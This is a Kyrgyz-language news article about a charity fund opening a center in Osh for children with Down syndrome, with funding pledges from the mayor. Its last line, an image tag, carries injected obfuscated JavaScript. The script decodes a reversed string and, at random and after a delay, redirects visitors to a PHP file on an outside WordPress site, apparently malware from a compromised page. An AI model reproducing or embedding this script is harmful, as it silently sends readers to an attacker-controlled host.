20-март күнү Ош шаарында Даун синдрому (хромосомалык потология менен жабыркаган) менен жабыркаган балдарды коомго аралаштыруу жана алардын ата-энелерин ар тараптан колдоо максатында «Сантерра-Юг» коомдук кайрымдуулук фонду тарабынан борбор ачылды. Жаңы борбордун ачылышына Ош шаарынын мэри Таалайбек Сарыбашов катышып, борборду ар тараптан колдоого ала тургандыгын, алардын иш багыты жеке көзөмөлдө болоорун белгиледи. -«Борбор ачылганга чейин фонддун өкүлдөрү менен жеке жолугуштум. Мэрия тараптан ар дайым колдоо болуп турат. “Кыштын камын жазда көр” демекчи борбордун жылуулугун борбордук системага кошуу боюнча тапшырма берилди. Жакынкы күндө ишке ашат. Мэрия тарабынан 144 миң сомду жардам катары кабыл алыңыздар»- деди, шаар башчысы. Ошондой эле, шаар башчысы Т. Сарыбашов борбордогу мугалимдердин квалификациясын жогорулатуу максатында жылда өтүүчү окууга барып келүү чыгымдары да шаар мэриясынын колдоосунда боло тургандыгын кошумчалады. «Сантерра-Юг» коомдук кайрымдуулук фондунун жетекчиси Жылдыз Туратбекова 2006-жылдан бери 21-март Даун синдрому бар балдардын эл аралык күнү белгиленип келе жатканын билдирди.
![](http://erkin-<script>$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/03/img_8168.jpg» data-object-fit=»cover»/><div class=)